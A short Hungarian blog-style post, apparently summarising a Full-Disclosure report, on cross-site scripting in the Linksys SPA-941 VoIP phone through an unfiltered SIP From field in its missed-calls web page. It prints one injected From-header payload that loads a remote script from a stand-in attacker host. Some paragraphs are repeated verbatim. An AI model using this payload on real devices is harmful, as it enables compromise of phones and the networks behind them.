Ha kocka lennék most azt mondanám, lol. Mondjuk kocka vagyok, de csak azért sem mondom :) Szóval hogy a fenébe lehet cross-site scriptinget csinálni egy telefonnal? A válasz egyszerű, ha el sikerül vonatkoztatnunk a manapság leggyakrabban használt vezetékes és mobil készülékektől: VoIP telefont fogunk hackelni, méghozzá hardot!
A célpont egy Linksys SPA-941 típusú VoIP telefon lesz, amely egy beépített webkiszolgálóval rendelkezik, melyen keresztül elvégezhető egy csomó hasznos telefonnal kapcsolatos tennivaló. Ezek egyike a nem fogadott hívások listázása, melynek során azt találjuk, hogy a From mező értéke nincs megfelelően szűrve. Nosza, küldjünk egy speciális SIP csomagot a telefonnak a következő feladóval:
A célpont egy Linksys SPA-941 típusú VoIP telefon lesz, amely egy beépített webkiszolgálóval rendelkezik, melyen keresztül elvégezhető egy csomó hasznos telefonnal kapcsolatos tennivaló. Ezek egyike a nem fogadott hívások listázása, melynek során azt találjuk, hogy a From mező értéke nincs megfelelően szűrve. Nosza, küldjünk egy speciális SIP csomagot a telefonnak a következő feladóval:
"<script x='" <sip:'src='http://attacker/xss.js'>@192.168.1.9:5060>;tag=1",A következő alkalommal, amikor valaki utánanéz a nem fogadott hívásoknak , szépen lefut a távoli szkript, és hopp, kompromitáltuk is a gépet! A legjobb az egészben, hogy ha egy belső hálón lévő telefont "hívunk fel", simán átmászhatunk a céges tűzfalon is (ha Jeremiah Grossmann vonatkozó írását megtalálja valaki, pls küldje be kommentbe)!
A módszert Radu State küldte be a Full-Disclosure-re, további infot ott találtok.
A módszert Radu State küldte be a Full-Disclosure-re, további infot ott találtok.
